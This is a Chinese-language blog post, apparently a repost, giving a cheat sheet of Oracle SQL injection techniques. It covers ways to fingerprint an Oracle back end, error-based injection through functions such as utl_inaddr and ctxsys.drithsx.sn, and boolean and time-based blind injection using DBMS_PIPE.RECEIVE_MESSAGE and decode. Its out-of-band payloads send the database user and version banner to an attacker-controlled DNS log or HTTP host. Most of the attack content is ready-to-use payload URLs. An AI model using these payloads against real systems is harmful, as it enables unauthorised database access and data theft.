Oracle 注入基础总结

最新推荐文章于 2023-04-23 09:16:13 发布
最新推荐文章于 2023-04-23 09:16:13 发布
阅读量257 收藏
点赞数
文章标签: 数据库 php
原文链接:https://segmentfault.com/a/1190000013859761
版权

Oracle注入基础

知识

  • Oracle中的dual表

    • dual是oracle中的伪表 (之有一行一列)
    • 每个用户都可以使用
    • 也可能被删掉 sys可以恢复

如:
clipboard.png

Tips:

1.Oracle的数据类型是强匹配的(MYSQL有弱匹配的味道),所以在Oracle进行类似UNION查询数据时候必须让对应位置上的数据类型和表中的列的数据类型是一致的,也可以使用null代替某些无法快速猜测出数据类型的位置。

2.Oracle的单行注释符号是-- ,多行注释符号/**/。

判断Oracle数据库
  1. 利用函数来判断是否oracle数据 如:and len('a')=1
    (在mssql和mysql以及db2内,返回长度值是调用len()函数;在oracle和INFORMIX则是通过length()来返回长度值。)
  2. 也可以通过dual来判断是否为oracle
select count(*) from dual where 1=1 and (select count(*) from dual)>1 --

clipboard.png

 select count(*) from dual where 1=1 and (select count(*) from dual)>0 --

clipboard.png

报错注入
  • 利用 utl_inaddr.get_host_name
    这种方法在Oracle 8g,9g,10g中不需要任何权限,但是在Oracle 11g以及以后的版本中,官方加强了访问控制权限,所以在11g以后要使用此方法进行报错注入,当前数据库用户必须有网络访问权限。
http://www.test.com/oracle.jsp?name=' and 1=utl_inaddr.get_host_name((select user from dual))--
  • 利用 ctxsys.drithsx.sn()
http://www.test.com/oracle.jsp?name=' and 1=ctxsys.drithsx.sn(1,(select user from dual))--
  • 利用 dbms_xdb_version.checkin()
http://www.test.com/oracle.jsp?name=1' and (select dbms_xdb_version.checkin((select user from dual)) from dual) is not null–
  • 利用 dbms_xdb_version.makeversioned()
http://www.test.com/oracle.jsp?name=1' and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null --
  • 利用dbms_xdb_version.uncheckout()
http://www.test.com/oracle.jsp?name=1' and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null --
  • 利用dbms_utility.sqlid_to_sqlhash()
http://www.test.com/oracle.jsp?name=1' and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null --
  • 利用ordsys.ord_dicom.getmappingxpath()
http://www.test.com/oracle.jsp?name=1' and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)
  • 使用decode进行报错注入,这种方式更偏向布尔型注入,因为这种方式并不会通过报错把查询结果回显回来,仅是用来作为页面的表现不同的判断方法。
http://www.test.com/oracle.jsp?name=11' and 1=(select decode(substr(user,1,1),'S',(1/0),0) from dual) --
  • XMLType

在使用这个XMLType进行报错时,很多人不知道为什么要用chr(60),通过ascii查询可以看到,60:<,58:’:’,62:’>’,查了下相关的api,发现xmltype在进行解析的时候必须以<开头>结尾,这里:冒号在这是必不可少的,至于为什么是冒号这个我也没查到,另外需要注意的是如果返回的数据种有空格的话,它会自动截断,导致数据不完整,有replace函数替换成其他非空字符就可以。

http://www.test.com/oracle.jsp?name=1'and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null--
Oracle带外通信获取信息
  • utl_http.request()
     http://www.test.com/oracle.jsp?name=1' and 1=utl_http.request('http://10.10.10.10(自己搭建dnslog或者用现有的):80/'||(select banner from sys.v_$version where rownum=1)) --
  • utl_inaddr.get_host_address()
 http://www.test.com/oracle.jsp?name=1' and (select utl_inaddr.get_host_address((select user from dual)||'.sssss.com(自己搭建dnslog或者用现有的)') from dual)is not null --
  • SYS.DBMS_LDAP.INIT
 http://www.test.com/oracle.jsp?name=1' and (select SYS.DBMS_LDAP.INIT((select user from dual)||'.sssss.com(自己搭建dnslog或者用现有的)') from dual)is not null --
布尔盲注

这里的布尔盲注跟Mysql没有感觉有什么大区别,时间盲注感觉也是一样 只是函数的不同


```
**18031200424' AND ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s AND 'aaa'='aaa" % (i, ord(payload))
```
附上一个案例 http://wooyun.chamd5.org/bug_detail.php?wybug_id=wooyun-2016-0213757
时间盲注
  • 使用DBMS_PIPE.RECEIVE_MESSAGE()进行时间盲注
http://www.test.com/oracle.jsp?name=1'and 1=(DBMS_PIPE.RECEIVE_MESSAGE('a',10)) and '1'='1

实际用法:

http://www.test.com/oracle.jsp?name=1' AND 7238=(CASE WHEN (ASCII(SUBSTRC((SELECT NVL(CAST(USER AS VARCHAR(4000)),CHR(32)) FROM DUAL),3,1))>96) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(106)||CHR(72)||CHR(73),1) ELSE 7238 END) AND '1'='1&sname=1

【DBMS_PIPE.RECEIVE_MESSAGE的理解】

来自官网的DBMS_PIPE.RECEIVE_MESSAGE语法:

DBMS_PIPE.RECEIVE_MESSAGE (

pipename IN VARCHAR2,

timeout IN INTEGER DEFAULT maxwait)

RETURN INTEGER;

可以暂时理解成DBMS_PIPE.RECEIVE_MESSAGE('任意值',延迟时间)

  • 使用decode()进时间盲注

(select count(*) from all_objects) 会花费更多是时间去查询所有数据库的条目,所以以这种方式进行时间判断依据,这是一个骚气的方式。(类比OWASP测试指南中老虎机的案例)

http://www.test.com/oracle.jsp?name=1'and 1=(select decode(substr(user,1,1),'S',(select count(*) from all_objects),0) from dual) and '1'='1

使用decode与DBMS_PIPE.RECEIVE_MESSAGE嵌套的方式进行时间盲注。

http://www.test.com/oracle.jsp?name=1'and 1=(select decode(substr(user,1,1),'A',DBMS_PIPE.RECEIVE_MESSAGE('RDS',5) ,0) from dual) and '1'='1

相关资料:
http://www.freebuf.com/column...
https://www.iswin.org/2015/06...
https://ricterz.me/posts/%E7%...

weixin_34220623
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
springFramework:它总结了研究spring框架的内容。
04-07
总结了研究spring框架的内容。 参考链接 基础 基础 申请 0. Spring基础 :pencil: [数据库编程] :pushpin: :pencil: [Spring Web表单] 1.建立一个Spring开发环境 依赖注入:请参阅Kong店编码阶段的视频 ...
oracle 布尔盲注,Oracle基于布尔的盲注总结
weixin_32842805的博客
04-03 1017
0x01 decode函数布尔盲注decode(字段或字段的运算,值1,值2,值3)这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3当然值1,值2,值3也可以是表达式,这个函数使得某些sql语句简单了许多使用方法:比较大小select decode(sign(变量1-变量2),-1,变量1,变量2) from dual; --取较小值sign()函数根据某个值是...
布尔盲注-
晨辰.的博客
03-25 2926
布尔盲注
干货 | Oracle注入和漏洞利用姿势总结
Javachichi的博客
01-17 1790
Oracle Database,又名 Oracle RDBMS,或简称 Oracle。是甲骨文公司的一款关系数据库管理系统。它是在数据库领域一直处于领先地位的产品。可以说 Oracle 数据库系统是世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小微机环境。它是一种高效率的、可靠性好的、适应高吞吐量的数据库方案。
【SQL注入漏洞-04】布尔盲注靶场实战
cc
02-03 6593
当我们改变前端页面传输给后台sql参数时,页面没有显示相应内容也没有显示报错信息时,不能使用联合查询注入和报错注入,这时我们可以考虑是否为基于布尔的盲注。 利用页面返回的布尔类型状态,正常或者不正常; 我们输入的语句让页面呈现出两种状态,相当于true和false,根据这两种状态可以判断我们输入的语句是否查询成功。布尔盲注就是根据这两种状态,来反推我们输入的条件是真还是假。以sqli-labs-masterless-8关为例
Oracle基于延时的盲注总结
mingyqf的博客
04-23 820
oracle注入中可以通过页面响应的状态,这里指的是响应时间,通过这种方式判断SQL是否被执行的方式,便是时间盲注;
Java学习笔记-个人整理的
12-19
{1.3.1}总结}{23}{subsection.1.3.1} {1.4}数据类型}{23}{section.1.4} {1.4.1}整数与浮点数}{23}{subsection.1.4.1} {1.4.1.1}浮点数原理}{24}{subsubsection.1.4.1.1} {1.4.2}格式化输出浮点数}{24}{...
Java面试宝典2010版
03-29
Java基础部分 7 1、一个".java"源文件中是否可以包括多个类(不是内部类)?有什么限制? 7 2、Java有没有goto? 7 3、说说&和&&的区别。 8 4、在JAVA中如何跳出当前的多重嵌套循环? 8 5、switch语句能否作用在byte...
Web安全深度剖析(张柄帅)
07-25
《Web安全深度剖析》总结了当前流行的高危漏洞的形成原因、攻击手段及解决方案,并通过大量的示例代码复现漏洞原型,制作模拟环境,更好地帮助读者深入了解Web应用程序中存在的漏洞,防患于未然。 《Web安全深度剖析...
《安全参考》2013第八期
08-29
第 1 节 SQL 注入基础的几个问题及解决方法 4 第 2 节 配合 sqlmap 与实例的高级注入总结 6 第三章 常规渗透 8 第 1 节 一次 xss 后两种方法后台过 fck2.6.4.1 拿 shell 8 第 2 节 MS10-070 ASP.NET Padding ...
Oracle数据库中SQL注入攻击的检测与防御
03-01
论文介绍了SQL注人攻击及其常用的攻击技术,给出了在Oracle数据库中对SQL注人攻击的检测方法与 防御措施,文中的检测方法和预防措施可以应用到任意的数据库系统中。
oracle 布尔盲注,Oracle基于延时的盲注总结
weixin_39914975的博客
04-03 327
0x00前言oracle注入中可以通过页面响应的状态,这里指的是响应时间,通过这种方式判断SQL是否被执行的方式,便是时间盲注;oracle的时间盲注通常使用DBMS_PIPE.RECEIVE_MESSAGE(),而另外一种便是decode()与高耗时SQL操作的组合,当然也可以是case,if 等方式与高耗时操作的组合,这里的高耗时操作指的是,例如:(select count(*) from ...
Oracle注入
weixin_48141183的博客
11-03 6692
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 近日学习了Oracle注入,写这篇文章主要当作自己的笔记,也希望能成为大家的参考。 一、Oracle的获取数据的基本技巧 1.特殊表 • dual表 ◆ 是一个虚拟的表,用来构成select的语法规则,oracle保证dual里面永远只有一条记录。 • user_tables表 ◆ 该表的ta.
盲注
vcdy
06-04 1287
http://127.0.0.1/sqli-labs/Less-5?id=1 and 1=1 --+ 正常http://127.0.0.1/sqli-labs/Less-5?id=1 and 1=2 --+ 正常http://127.0.0.1/sqli-labs/Less-5?id=1' and 1=2 --+ 不正常http://127.0.0.1/sqli-labs/Less-5?id=1'...
oracle 盲注注入,【实战】SQL注入脚本记录
weixin_42400621的博客
04-10 2539
记录最近项目写的几个盲注脚本,方便以后使用1、ORACLE布尔型盲注import urllibimport urllib2import requestspayloads = '_ABCDEFGHIJKLMNOPQRSTUVWXYZ'header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' }values=...
oracle 布尔盲注,Oracle的SQL盲注入
weixin_39550379的博客
04-03 304
Oracle的SQL盲注入[出处未知]盲注入_BlindInject,请参考0x90.org的papers1.详细,from [email protected].快速,from google+CROWBARid=1+and+(select+count(*)+from+users)>0id=1+and+(select+count(*)+from+##1##)>0(##1##是从file...
Oracle2021 年度安全警告,8 个安全漏洞需要注意
极客日报
01-20 2822
| 快讯 Oracle 公司 于 2021 年 1 月 19 日,发布了第一个年度安全预警。其中,有 8 个安全警告和 Oracle 数据库部分有关。目前,可以通过最新的 CPU 补丁,可以修复这个安全漏洞。 以下是这 8 个安全漏洞: CVE-2021-2018 该漏洞无需身份验证即可远程利用,入侵者可以通过网络利用这些漏洞并且不需要用户凭据。给出的安全系数风险评分是 8.3 分。不过,此攻击复杂度较高,也只影响 Windows 平台 CVE-2021-2035 被通过数据库的Scheduler
Oracle注入基础篇)
hackzkaq的博客
03-01 4276
基础学黑客,搜索公众号:白帽子左一 先了解Oracle一些内容 Oracle做联合注入的注意事项(附带示例) 联合查询的字段数必须和前面的查询语句字段数一致 select id,username,password from admin union select 1,'admin' from dual (X) 联合查询的字段类型也必须和前面的查询语句字段类型一致 select id,username,password from admin union select 1,2,3 from dual (X)
oracle手动注入
kfjrlgagkogkhpa的博客
03-23 2093
1、首先判断是否存在注入点 and 1=1/and 1=2 2、然后在判断是什么类型数据库and (select count () from dual)>0** Ps:Dual为oracle的一个默认表 eg:http://xxx.xx.xx.xx:xxxx/new_list.php?id=1 and (select count () from dual)>0,正常则表示为Oracle数据库 3、判断列数order by 看页面是否正常显示 4、联合注入, union select null,n
oracle注入报错500
最新发布
05-26
Oracle注入报错500一般表示服务器端出现了内部错误,可能与注入攻击有关,但也可能是其他原因导致的。要解决此问题,可以尝试以下步骤: 1. 检查注入语句是否正确,是否存在语法错误或拼写错误等问题。 2. 检查注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值